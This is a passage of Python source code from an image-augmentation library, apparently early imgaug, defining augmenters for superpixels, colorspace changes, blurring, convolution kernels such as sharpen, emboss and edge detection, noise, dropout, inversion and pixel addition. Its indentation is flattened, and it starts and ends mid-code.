assert 0 <= p_replace[0] <= 1.0
assert 0 <= p_replace[1] <= 1.0
self.p_replace = p_replace = Binomial(Uniform(p_replace[0], p_replace[1]))
elif isinstance(p_replace, StochasticParameter):
self.p_replace = p_replace
else:
raise Exception("Expected p_replace to be float, int, list/tuple of floats/ints or StochasticParameter, got %s." % (type(p_replace),))
if ia.is_single_integer(n_segments):
self.n_segments = Deterministic(n_segments)
elif ia.is_iterable(n_segments):
assert len(n_segments) == 2, "Expected tuple/list with 2 entries, got %d entries." % (str(len(n_segments)),)
self.n_segments = DiscreteUniform(n_segments[0], n_segments[1])
elif isinstance(n_segments, StochasticParameter):
self.n_segments = n_segments
else:
raise Exception("Expected int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(n_segments),))
self.max_size = max_size
self.interpolation = interpolation
def _augment_images(self, images, random_state, parents, hooks):
#import time
nb_images = len(images)
#p_replace_samples = self.p_replace.draw_samples((nb_images,), random_state=random_state)
n_segments_samples = self.n_segments.draw_samples((nb_images,), random_state=random_state)
seeds = random_state.randint(0, 10**6, size=(nb_images,))
for i in sm.xrange(nb_images):
#replace_samples = ia.new_random_state(seeds[i]).binomial(1, p_replace_samples[i], size=(n_segments_samples[i],))
replace_samples = self.p_replace.draw_samples((n_segments_samples[i],), random_state=ia.new_random_state(seeds[i]))
#print("n_segments", n_segments_samples[i], "replace_samples.shape", replace_samples.shape)
#print("p", p_replace_samples[i])
#print("replace_samples", replace_samples)
if np.max(replace_samples) == 0:
# not a single superpixel would be replaced by its average color,
# i.e. the image would not be changed, so just keep it
pass
else:
image = images[i]
orig_shape = image.shape
if self.max_size is not None:
size = max(image.shape[0], image.shape[1])
if size > self.max_size:
resize_factor = self.max_size / size
new_height, new_width = int(image.shape[0] * resize_factor), int(image.shape[1] * resize_factor)
image = ia.imresize_single_image(image, (new_height, new_width), interpolation=self.interpolation)
#image_sp = np.random.randint(0, 255, size=image.shape).astype(np.uint8)
image_sp = np.copy(image)
#time_start = time.time()
segments = segmentation.slic(image, n_segments=n_segments_samples[i], compactness=10)
#print("seg", np.min(segments), np.max(segments), n_segments_samples[i])
#print("segmented in %.4fs" % (time.time() - time_start))
#print(np.bincount(segments.flatten()))
#time_start = time.time()
nb_channels = image.shape[2]
for c in sm.xrange(nb_channels):
# segments+1 here because otherwise regionprops always misses
# the last label
regions = measure.regionprops(segments+1, intensity_image=image[..., c])
for ridx, region in enumerate(regions):
# with mod here, because slic can sometimes create more superpixel
# than requested. replace_samples then does not have enough
# values, so we just start over with the first one again.
if replace_samples[ridx % len(replace_samples)] == 1:
#print("changing region %d of %d, channel %d, #indices %d" % (ridx, np.max(segments), c, len(np.where(segments == ridx)[0])))
mean_intensity = region.mean_intensity
image_sp_c = image_sp[..., c]
image_sp_c[segments == ridx] = mean_intensity
#print("colored in %.4fs" % (time.time() - time_start))
if orig_shape != image.shape:
image_sp = ia.imresize_single_image(image_sp, orig_shape[0:2], interpolation=self.interpolation)
images[i] = image_sp
return images
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
return keypoints_on_images
def get_parameters(self):
return [self.n_segments, self.max_size]
# TODO tests
# Note: Not clear whether this class will be kept (for anything aside from grayscale)
# other colorspaces dont really make sense and they also might not work correctly
# due to having no clearly limited range (like 0-255 or 0-1)
class ChangeColorspace(Augmenter):
RGB = "RGB"
BGR = "BGR"
GRAY = "GRAY"
CIE = "CIE"
YCrCb = "YCrCb"
HSV = "HSV"
HLS = "HLS"
Lab = "Lab"
Luv = "Luv"
COLORSPACES = set([
RGB,
BGR,
GRAY,
CIE,
YCrCb,
HSV,
HLS,
Lab,
Luv
])
CV_VARS = {
# RGB
#"RGB2RGB": cv2.COLOR_RGB2RGB,
"RGB2BGR": cv2.COLOR_RGB2BGR,
"RGB2GRAY": cv2.COLOR_RGB2GRAY,
"RGB2CIE": cv2.COLOR_RGB2XYZ,
"RGB2YCrCb": cv2.COLOR_RGB2YCR_CB,
"RGB2HSV": cv2.COLOR_RGB2HSV,
"RGB2HLS": cv2.COLOR_RGB2HLS,
"RGB2LAB": cv2.COLOR_RGB2LAB,
"RGB2LUV": cv2.COLOR_RGB2LUV,
# BGR
"BGR2RGB": cv2.COLOR_BGR2RGB,
#"BGR2BGR": cv2.COLOR_BGR2BGR,
"BGR2GRAY": cv2.COLOR_BGR2GRAY,
"BGR2CIE": cv2.COLOR_BGR2XYZ,
"BGR2YCrCb": cv2.COLOR_BGR2YCR_CB,
"BGR2HSV": cv2.COLOR_BGR2HSV,
"BGR2HLS": cv2.COLOR_BGR2HLS,
"BGR2LAB": cv2.COLOR_BGR2LAB,
"BGR2LUV": cv2.COLOR_BGR2LUV,
# HSV
"HSV2RGB": cv2.COLOR_HSV2RGB,
"HSV2BGR": cv2.COLOR_HSV2BGR,
}
def __init__(self, to_colorspace, alpha, from_colorspace="RGB", name=None, deterministic=False, random_state=None):
super(ChangeColorspace, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
if ia.is_single_number(alpha):
self.alpha = Deterministic(alpha)
elif ia.is_iterable(alpha):
assert len(alpha) == 2, "Expected tuple/list with 2 entries, got %d entries." % (str(len(alpha)),)
self.alpha = Uniform(alpha[0], alpha[1])
elif isinstance(p, StochasticParameter):
self.alpha = alpha
else:
raise Exception("Expected alpha to be int or float or tuple/list of ints/floats or StochasticParameter, got %s." % (type(alpha),))
if ia.is_string(to_colorspace):
assert to_colorspace in ChangeColorspace.COLORSPACES
self.to_colorspace = Deterministic(to_colorspace)
elif ia.is_iterable(to_colorspace):
assert all([ia.is_string(colorspace) for colorspace in to_colorspace])
assert all([(colorspace in ChangeColorspace.COLORSPACES) for colorspace in to_colorspace])
self.to_colorspace = Choice(to_colorspace)
elif isinstance(to_colorspace, StochasticParameter):
self.to_colorspace = to_colorspace
else:
raise Exception("Expected to_colorspace to be string, list of strings or StochasticParameter, got %s." % (type(to_colorspace),))
self.from_colorspace = from_colorspace
assert self.from_colorspace in ChangeColorspace.COLORSPACES
assert from_colorspace != ChangeColorspace.GRAY
def _augment_images(self, images, random_state, parents, hooks):
result = images
nb_images = len(images)
alphas = self.alpha.draw_samples((nb_images,), random_state=ia.copy_random_state(random_state))
to_colorspaces = self.to_colorspace.draw_samples((nb_images,), random_state=ia.copy_random_state(random_state))
for i in sm.xrange(nb_images):
alpha = alphas[i]
to_colorspace = to_colorspaces[i]
image = images[i]
assert 0.0 <= alpha <= 1.0
assert to_colorspace in ChangeColorspace.COLORSPACES
if alpha == 0 or self.from_colorspace == to_colorspace:
pass # no change necessary
else:
# some colorspaces here should use image/255.0 according to the docs,
# but at least for conversion to grayscale that results in errors,
# ie uint8 is expected
if self.from_colorspace in [ChangeColorspace.RGB, ChangeColorspace.BGR]:
from_to_var_name = "%s2%s" % (self.from_colorspace, to_colorspace)
from_to_var = ChangeColorspace.CV_VARS[from_to_var_name]
img_to_cs = cv2.cvtColor(image, from_to_var)
else:
# convert to RGB
from_to_var_name = "%s2%s" % (self.from_colorspace, ChangeColorspace.RGB)
from_to_var = ChangeColorspace.CV_VARS[from_to_var_name]
img_rgb = cv2.cvtColor(image, from_to_var)
if to_colorspace == ChangeColorspace.RGB:
img_to_cs = img_rgb
else:
# convert from RGB to desired target colorspace
from_to_var_name = "%s2%s" % (ChangeColorspace.RGB, to_colorspace)
from_to_var = ChangeColorspace.CV_VARS[from_to_var_name]
img_to_cs = cv2.cvtColor(img_rgb, from_to_var)
# this will break colorspaces that have values outside 0-255 or 0.0-1.0
if ia.is_integer_array(img_to_cs):
img_to_cs = np.clip(img_to_cs, 0, 255).astype(np.uint8)
else:
img_to_cs = np.clip(img_to_cs * 255, 0, 255).astype(np.uint8)
if len(img_to_cs.shape) == 2:
img_to_cs = img_to_cs[:, :, np.newaxis]
img_to_cs = np.tile(img_to_cs, (1, 1, 3))
if alpha == 1:
result[i] = img_to_cs
else:
result[i] = (alpha * img_to_cs + (1 - alpha) * image).astype(np.uint8)
return images
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
return keypoints_on_images
def get_parameters(self):
return [self.alpha, self.to_colorspace]
# TODO tests
def Grayscale(alpha=0, from_colorspace="RGB", name=None, deterministic=False, random_state=None):
return ChangeColorspace(to_colorspace=ChangeColorspace.GRAY, alpha=alpha, from_colorspace=from_colorspace, name=name, deterministic=deterministic, random_state=random_state)
class GaussianBlur(Augmenter):
"""Apply GaussianBlur to input images
Parameters
----------
sigma : float, list/iterable of length 2 of floats or StochasticParameter
variance parameter.
name : string, optional(default=None)
name of the instance
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
everytime
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(self, sigma=0, name=None, deterministic=False, random_state=None):
super(GaussianBlur, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
if ia.is_single_number(sigma):
self.sigma = Deterministic(sigma)
elif ia.is_iterable(sigma):
assert len(sigma) == 2, "Expected tuple/list with 2 entries, got %d entries." % (str(len(sigma)),)
self.sigma = Uniform(sigma[0], sigma[1])
elif isinstance(sigma, StochasticParameter):
self.sigma = sigma
else:
raise Exception("Expected float, int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(sigma),))
def _augment_images(self, images, random_state, parents, hooks):
result = images
nb_images = len(images)
samples = self.sigma.draw_samples((nb_images,), random_state=random_state)
for i in sm.xrange(nb_images):
nb_channels = images[i].shape[2]
sig = samples[i]
if sig > 0:
for channel in sm.xrange(nb_channels):
result[i][:, :, channel] = ndimage.gaussian_filter(result[i][:, :, channel], sig)
return result
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
return keypoints_on_images
def get_parameters(self):
return [self.sigma]
# TODO tests
class Convolve(Augmenter):
"""Apply a Convolution to input images.
Parameters
----------
matrix : None, 2D numpy array, StochasticParameter, function
The weight matrix of the convolution kernel to apply.
If None, a unit matrix will be used that does not change the image.
If a numpy array, that array will be used for all images and channels.
If a stochastic parameter, C new matrices will be generated
via param.draw_samples(C) for each image, where C is the number of
channels.
If a function, the parameter will be called for each image
via param(C, random_state). The function must return C matrices,
one per channel.
name : TODO
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
everytime
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(self, matrix=None, name=None, deterministic=False, random_state=None):
super(Convolve, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
if matrix is None:
self.matrix = np.array([[1]], dtype=np.float32)
self.matrix_type = "constant"
elif ia.is_np_array(matrix):
assert len(matrix.shape) == 2, "Expected convolution matrix to have 2 axis, got %d (shape %s)." % (len(matrix.shape), matrix.shape)
self.matrix = matrix
self.matrix_type = "constant"
elif isinstance(matrix, StochasticParameter):
self.matrix = matrix
self.matrix_type = "stochastic"
elif isinstance(matrix, types.FunctionType):
self.matrix = matrix
self.matrix_type = "function"
else:
raise Exception("Expected float, int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(sigma),))
def _augment_images(self, images, random_state, parents, hooks):
result = images
nb_images = len(images)
for i in sm.xrange(nb_images):
height, width, nb_channels = images[i].shape
if self.matrix_type == "constant":
matrices = [self.matrix] * nb_channels
elif self.matrix_type == "stochastic":
matrices = self.matrix.draw_samples((nb_channels), random_state=random_state)
elif self.matrix_type == "function":
matrices = self.matrix(nb_channels, random_state)
else:
raise Exception("Invalid matrix type")
for channel in sm.xrange(nb_channels):
#result[i][..., channel] = ndimage.convolve(result[i][..., channel], matrices[channel], mode='constant', cval=0.0)
result[i][..., channel] = cv2.filter2D(result[i][..., channel], -1, matrices[channel])
result = np.clip(result, 0, 255).astype(np.uint8)
return result
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
# TODO this can fail for some matrices, e.g. [[0, 0, 1]]
return keypoints_on_images
def get_parameters(self):
return [self.matrix, self.matrix_type]
# TODO tests
"""Creates an augmenter that sharpens images.
Parameters
----------
alpha : int, float, tuple of two ints/floats or StochasticParameter
Visibility of the sharpened image. At 0, only the original image is visible,
at 1.0 only its sharpened version is visible.
strength : int, float, tuple of two ints/floats or StochasticParameter, optional
Parameter that controls the strength of the sharpening.
Sane values are somewhere in the range (0.5, 2).
The value 0 results in an edge map. Values higher than 1 create bright images.
Default value is 1.
name : TODO
deterministic : TODO
random_state : TODO
Example:
aug = Sharpen(alpha=(0.0, 1.0), strength=(0.75, 2.0))
image_aug = aug.augment_image(image)
"""
def Sharpen(alpha=0, strength=1, name=None, deterministic=False, random_state=None):
if ia.is_single_number(alpha):
alpha_param = Deterministic(alpha)
elif ia.is_iterable(alpha):
assert len(alpha) == 2, "Expected tuple/list with 2 entries, got %d entries." % (str(len(alpha)),)
alpha_param = Uniform(alpha[0], alpha[1])
elif isinstance(alpha, StochasticParameter):
alpha_param = alpha
else:
raise Exception("Expected float, int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(alpha),))
if ia.is_single_number(strength):
strength_param = Deterministic(strength)
elif ia.is_iterable(strength):
assert len(strength) == 2, "Expected tuple/list with 2 entries, got %d entries." % (str(len(strength)),)
strength_param = Uniform(strength[0], strength[1])
elif isinstance(strength, StochasticParameter):
strength_param = strength
else:
raise Exception("Expected float, int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(strength),))
def create_matrices(nb_channels, random_state_func):
alpha_sample = alpha_param.draw_sample(random_state=random_state_func)
assert 0 <= alpha_sample <= 1.0
strength_sample = strength_param.draw_sample(random_state=random_state_func)
matrix_nochange = np.array([
[0, 0, 0],
[0, 1, 0],
[0, 0, 0]
], dtype=np.float32)
matrix_effect = np.array([
[-1, -1, -1],
[-1, 8+strength_sample, -1],
[-1, -1, -1]
], dtype=np.float32)
matrix = (1-alpha_sample) * matrix_nochange + alpha_sample * matrix_effect
return [matrix] * nb_channels
return Convolve(create_matrices, name=name, deterministic=deterministic, random_state=random_state)
# TODO tests
"""Creates an augmenter that embosses an image.
The embossed version pronounces highlights and shadows,
letting the image look as if it was recreated on a metal plate ("embossed").
Parameters
----------
alpha : int, float, tuple of two ints/floats or StochasticParameter
Visibility of the embossed image. At 0, only the original image is visible,
at 1.0 only the embossed image is visible.
strength : int, float, tuple of two ints/floats or StochasticParameter, optional
Parameter that controls the strength of the embossing.
Sane values are somewhere in the range (0, 2) with 1 being the standard
embossing effect. Default value is 1.
name : TODO
deterministic : TODO
random_state : TODO
Example:
aug = Emboss(alpha=(0.0, 1.0), strength=(0.5, 1.5))
image_aug = aug.augment_image(image)
"""
def Emboss(alpha=0, strength=1, name=None, deterministic=False, random_state=None):
if ia.is_single_number(alpha):
alpha_param = Deterministic(alpha)
elif ia.is_iterable(alpha):
assert len(alpha) == 2, "Expected tuple/list with 2 entries, got %d entries." % (str(len(alpha)),)
alpha_param = Uniform(alpha[0], alpha[1])
elif isinstance(alpha, StochasticParameter):
alpha_param = alpha
else:
raise Exception("Expected float, int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(alpha),))
if ia.is_single_number(strength):
strength_param = Deterministic(strength)
elif ia.is_iterable(strength):
assert len(strength) == 2, "Expected tuple/list with 2 entries, got %d entries." % (str(len(strength)),)
strength_param = Uniform(strength[0], strength[1])
elif isinstance(strength, StochasticParameter):
strength_param = strength
else:
raise Exception("Expected float, int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(strength),))
def create_matrices(nb_channels, random_state_func):
alpha_sample = alpha_param.draw_sample(random_state=random_state_func)
assert 0 <= alpha_sample <= 1.0
strength_sample = strength_param.draw_sample(random_state=random_state_func)
matrix_nochange = np.array([
[0, 0, 0],
[0, 1, 0],
[0, 0, 0]
], dtype=np.float32)
matrix_effect = np.array([
[-1-strength_sample, 0-strength_sample, 0],
[0-strength_sample, 1, 0+strength_sample],
[0, 0+strength_sample, 1+strength_sample]
], dtype=np.float32)
matrix = (1-alpha_sample) * matrix_nochange + alpha_sample * matrix_effect
return [matrix] * nb_channels
return Convolve(create_matrices, name=name, deterministic=deterministic, random_state=random_state)
# TODO tests
"""Creates an augmenter that pronounces all edges in the image.
Parameters
----------
alpha : int, float, tuple of two ints/floats or StochasticParameter
Visibility of the edge map. At 0, only the original image is visible,
at 1.0 only the edge map is visible.
name : TODO
deterministic : TODO
random_state : TODO
Example:
aug = EdgeDetect(alpha=(0.0, 1.0))
image_aug = aug.augment_image(image)
"""
def EdgeDetect(alpha=0, name=None, deterministic=False, random_state=None):
if ia.is_single_number(alpha):
alpha_param = Deterministic(alpha)
elif ia.is_iterable(alpha):
assert len(alpha) == 2, "Expected tuple/list with 2 entries, got %d entries." % (str(len(alpha)),)
alpha_param = Uniform(alpha[0], alpha[1])
elif isinstance(alpha, StochasticParameter):
alpha_param = alpha
else:
raise Exception("Expected float, int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(alpha),))
def create_matrices(nb_channels, random_state_func):
alpha_sample = alpha_param.draw_sample(random_state=random_state_func)
assert 0 <= alpha_sample <= 1.0
matrix_nochange = np.array([
[0, 0, 0],
[0, 1, 0],
[0, 0, 0]
], dtype=np.float32)
matrix_effect = np.array([
[0, 1, 0],
[1, -4, 1],
[0, 1, 0]
], dtype=np.float32)
matrix = (1-alpha_sample) * matrix_nochange + alpha_sample * matrix_effect
return [matrix] * nb_channels
return Convolve(create_matrices, name=name, deterministic=deterministic, random_state=random_state)
# TODO tests
"""Creates an augmenter that pronounces edges that have certain directions.
Parameters
----------
alpha : int, float, tuple of two ints/floats or StochasticParameter
Visibility of the edge map. At 0, only the original image is visible,
at 1.0 only the edge map is visible.
direction : int, float, tuple of two ints/floats or StochasticParameter, optional
Angle of edges to pronounce, where 0 represents 0 degrees and 1.0
represents 360 degrees (both clockwise).
Default value is (0.0, 1.0), i.e. pick a random angle per image.
name : TODO
deterministic : TODO
random_state : TODO
Example:
aug = DirectedEdgeDetect(alpha=(0.0, 1.0), direction=(0.0, 1.0))
image_aug = aug.augment_image(image)
"""
def DirectedEdgeDetect(alpha=0, direction=(0, 1), name=None, deterministic=False, random_state=None):
if ia.is_single_number(alpha):
alpha_param = Deterministic(alpha)
elif ia.is_iterable(alpha):
assert len(alpha) == 2, "Expected tuple/list with 2 entries, got %d entries." % (str(len(alpha)),)
alpha_param = Uniform(alpha[0], alpha[1])
elif isinstance(alpha, StochasticParameter):
alpha_param = alpha
else:
raise Exception("Expected float, int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(alpha),))
if ia.is_single_number(direction):
direction_param = Deterministic(direction)
elif ia.is_iterable(direction):
assert len(direction) == 2, "Expected tuple/list with 2 entries, got %d entries." % (str(len(direction)),)
direction_param = Uniform(direction[0], direction[1])
elif isinstance(direction, StochasticParameter):
direction_param = direction
else:
raise Exception("Expected float, int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(direction),))
def create_matrices(nb_channels, random_state_func):
alpha_sample = alpha_param.draw_sample(random_state=random_state_func)
assert 0 <= alpha_sample <= 1.0
direction_sample = direction_param.draw_sample(random_state=random_state_func)
deg = int(direction_sample * 360) % 360
rad = np.deg2rad(deg)
x = np.cos(rad - 0.5*np.pi)
y = np.sin(rad - 0.5*np.pi)
#x = (deg % 90) / 90 if 0 <= deg <= 180 else -(deg % 90) / 90
#y = (-1) + (deg % 90) / 90 if 90 < deg < 270 else 1 - (deg % 90) / 90
direction_vector = np.array([x, y])
#print("direction_vector", direction_vector)
vertical_vector = np.array([0, 1])
matrix_effect = np.array([
[0, 0, 0],
[0, 0, 0],
[0, 0, 0]
], dtype=np.float32)
for x in [-1, 0, 1]:
for y in [-1, 0, 1]:
if (x, y) != (0, 0):
cell_vector = np.array([x, y])
#deg_cell = angle_between_vectors(vertical_vector, vec_cell)
distance_deg = np.rad2deg(ia.angle_between_vectors(cell_vector, direction_vector))
distance = distance_deg / 180
similarity = (1 - distance)**4
matrix_effect[y+1, x+1] = similarity
#print("cell", y, x, "distance_deg", distance_deg, "distance", distance, "similarity", similarity)
matrix_effect = matrix_effect / np.sum(matrix_effect)
matrix_effect = matrix_effect * (-1)
matrix_effect[1, 1] = 1
#for y in [0, 1, 2]:
# vals = []
# for x in [0, 1, 2]:
# vals.append("%.2f" % (matrix_effect[y, x],))
# print(" ".join(vals))
#print("matrix_effect", matrix_effect)
matrix_nochange = np.array([
[0, 0, 0],
[0, 1, 0],
[0, 0, 0]
], dtype=np.float32)
matrix = (1-alpha_sample) * matrix_nochange + alpha_sample * matrix_effect
return [matrix] * nb_channels
return Convolve(create_matrices, name=name, deterministic=deterministic, random_state=random_state)
def AdditiveGaussianNoise(loc=0, scale=0, per_channel=False, name=None, deterministic=False, random_state=None):
"""Add Random Gaussian Noise to images
Parameters
----------
loc : integer/ optional(default=0)
# TODO
scale : integer/optional(default=0)
# TODO
per_channel : boolean, optional(default=False)
Apply transformation in a per channel manner
name : string, optional(default=None)
name of the instance
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
everytime
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
if ia.is_single_number(loc):
loc2 = Deterministic(loc)
elif ia.is_iterable(loc):
assert len(loc) == 2, "Expected tuple/list with 2 entries for argument 'loc', got %d entries." % (str(len(scale)),)
loc2 = Uniform(loc[0], loc[1])
elif isinstance(loc, StochasticParameter):
loc2 = loc
else:
raise Exception("Expected float, int, tuple/list with 2 entries or StochasticParameter for argument 'loc'. Got %s." % (type(loc),))
if ia.is_single_number(scale):
scale2 = Deterministic(scale)
elif ia.is_iterable(scale):
assert len(scale) == 2, "Expected tuple/list with 2 entries for argument 'scale', got %d entries." % (str(len(scale)),)
scale2 = Uniform(scale[0], scale[1])
elif isinstance(scale, StochasticParameter):
scale2 = scale
else:
raise Exception("Expected float, int, tuple/list with 2 entries or StochasticParameter for argument 'scale'. Got %s." % (type(scale),))
return AddElementwise(Normal(loc=loc2, scale=scale2), per_channel=per_channel, name=name, deterministic=deterministic, random_state=random_state)
# TODO
#class MultiplicativeGaussianNoise(Augmenter):
# pass
# TODO
#class ReplacingGaussianNoise(Augmenter):
# pass
def Dropout(p=0, per_channel=False, name=None, deterministic=False,
random_state=None):
"""Dropout (Blacken) certain fraction of pixels
Parameters
----------
p : float, iterable of len 2, StochasticParameter optional(default=0)
per_channel : boolean, optional(default=False)
apply transform in a per channel manner
name : string, optional(default=None)
name of the instance
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
everytime
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Returns
-------
# TODO
"""
if ia.is_single_number(p):
p2 = Binomial(1 - p)
elif ia.is_iterable(p):
assert len(p) == 2
assert p[0] < p[1]
assert 0 <= p[0] <= 1.0
assert 0 <= p[1] <= 1.0
p2 = Binomial(Uniform(1 - p[1], 1 - p[0]))
elif isinstance(p, StochasticParameter):
p2 = p
else:
raise Exception("Expected p to be float or int or StochasticParameter, got %s." % (type(p),))
return MultiplyElementwise(p2, per_channel=per_channel, name=name, deterministic=deterministic, random_state=random_state)
# TODO tests
class Invert(Augmenter):
"""Augmenter that inverts all values in images.
For the standard value range of 0-255 it converts 0 to 255, 255 to 0
and 10 to (255-10)=245.
Let M be the maximum value possible, m the minimum value possible,
v a value. Then the distance of v to m is d=abs(v-m) and the new value
is given by v'=M-d.
Parameters
----------
min_value : TODO
max_value : TODO
per_channel : boolean, optional(default=False)
apply transform in a per channel manner
name : string, optional(default=None)
name of the instance
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
everytime
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(self, p=0, per_channel=False, min_value=0, max_value=255, name=None,
deterministic=False, random_state=None):
super(Invert, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
if ia.is_single_number(p):
self.p = Binomial(p)
elif isinstance(p, StochasticParameter):
self.p = p
else:
raise Exception("Expected p to be int or float or StochasticParameter, got %s." % (type(p),))
if per_channel in [True, False, 0, 1, 0.0, 1.0]:
self.per_channel = Deterministic(int(per_channel))
elif ia.is_single_number(per_channel):
assert 0 <= per_channel <= 1.0
self.per_channel = Binomial(per_channel)
else:
raise Exception("Expected per_channel to be boolean or number or StochasticParameter")
self.min_value = min_value
self.max_value = max_value
def _augment_images(self, images, random_state, parents, hooks):
result = images
nb_images = len(images)
seeds = random_state.randint(0, 10**6, (nb_images,))
for i in sm.xrange(nb_images):
image = images[i].astype(np.int32)
rs_image = ia.new_random_state(seeds[i])
per_channel = self.per_channel.draw_sample(random_state=rs_image)
if per_channel == 1:
nb_channels = image.shape[2]
p_samples = self.p.draw_samples((nb_channels,), random_state=rs_image)
for c, p_sample in enumerate(p_samples):
assert 0 <= p_sample <= 1
if p_sample > 0.5:
image_c = image[..., c]
distance_from_min = np.abs(image_c - self.min_value) # d=abs(v-m)
image[..., c] = -distance_from_min + self.max_value # v'=M-d
np.clip(image, 0, 255, out=image)
result[i] = image.astype(np.uint8)
else:
p_sample = self.p.draw_sample(random_state=rs_image)
assert 0 <= p_sample <= 1.0
if p_sample > 0.5:
distance_from_min = np.abs(image - self.min_value) # d=abs(v-m)
image = -distance_from_min + self.max_value
np.clip(image, 0, 255, out=image)
result[i] = image.astype(np.uint8)
return result
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
return keypoints_on_images
def get_parameters(self):
return [self.p, self.per_channel, self.min_value, self.max_value]
# TODO tests
class Add(Augmenter):
"""Augmenter that Adds a value elementwise to the pixels of the image
Parameters
----------
value : integer, iterable of len 2, StochasticParameter
value to be added to the pixels/elements
per_channel : boolean, optional(default=False)
apply transform in a per channel manner
name : string, optional(default=None)
name of the instance
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
everytime
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
channels : int, tuple/list of int, or None, optional (default=none)
Channels to apply values. Applying all values with None value.
"""
def __init__(self, value=0, per_channel=False, name=None,
deterministic=False, random_state=None, channels=None):
super(Add, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
if ia.is_single_integer(value):
assert -255 <= value <= 255, "Expected value to have range [-255, 255], got value %d." % (value,)
self.value = Deterministic(value)
elif ia.is_iterable(value):
assert len(value) == 2, "Expected tuple/list with 2 entries, got %d entries." % (len(value),)
self.value = DiscreteUniform(value[0], value[1])
elif isinstance(value, StochasticParameter):
self.value = value
else:
raise Exception("Expected float or int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(value),))
if per_channel in [True, False, 0, 1, 0.0, 1.0]:
self.per_channel = Deterministic(int(per_channel))
elif ia.is_single_number(per_channel):
assert 0 <= per_channel <= 1.0
self.per_channel = Binomial(per_channel)
else:
raise Exception("Expected per_channel to be boolean or number or StochasticParameter")
if channels is None:
self.channels = channels
elif ia.is_single_number(channels):
self.channels = [channels]
elif ia.is_iterable(value):
assert all(isinstance(c, int) for c in channels), "Expected tuple/list of int channels, got %s." % channels
self.channels = channels
else:
raise Exception("Expected None, int or tuple/list of int. Got %s." % type(channels))
def _augment_images(self, images, random_state, parents, hooks):
result = images
nb_images = len(images)
seeds = random_state.randint(0, 10**6, (nb_images,))
for i in sm.xrange(nb_images):
image = images[i].astype(np.int32)
rs_image = ia.new_random_state(seeds[i])
per_channel = self.per_channel.draw_sample(random_state=rs_image)
if per_channel == 1:
nb_channels = image.shape[2]
samples = self.value.draw_samples((nb_channels,), random_state=rs_image)
for c, sample in enumerate(samples):
if self.channels is None or c in self.channels:
assert -255 <= sample <= 255
image[..., c] += sample
np.clip(image, 0, 255, out=image)
result[i] = image.astype(np.uint8)
else:
sample = self.value.draw_sample(random_state=rs_image)
assert -255 <= sample <= 255
image[:, :, self.channels] += sample
np.clip(image, 0, 255, out=image)
result[i] = image.astype(np.uint8)
return result
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
return keypoints_on_images
def get_parameters(self):
return [self.value]
# TODO tests
class AddElementwise(Augmenter):
# TODO
def __init__(self, value=0, per_channel=False, name=None, deterministic=False, random_state=None):
super(AddElementwise, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
if ia.is_single_integer(value):
assert -255 <= value <= 255, "Expected value to have range [-255, 255], got value %d." % (value,)
self.value = Deterministic(value)
elif ia.is_iterable(value):
assert len(value) == 2, "Expected tuple/list with 2 entries, got %d entries." % (len(value),)
self.value = DiscreteUniform(value[0], value[1])
elif isinstance(value, StochasticParameter):
self.value = value
else:
raise Exception("Expected float or int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(value),))
if per_channel in [True, False, 0, 1, 0.0, 1.0]:
self.per_channel = Deterministic(int(per_channel))
elif ia.is_single_number(per_channel):
assert 0 <= per_channel <= 1.0
self.per_channel = Binomial(per_channel)
else:
raise Exception("Expected per_channel to be boolean or number or StochasticParameter")
def _augment_images(self, images, random_state, parents, hooks):
result = images
